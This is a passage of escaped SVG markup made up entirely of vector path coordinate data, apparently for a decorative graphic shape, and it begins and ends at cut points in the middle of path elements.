3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path 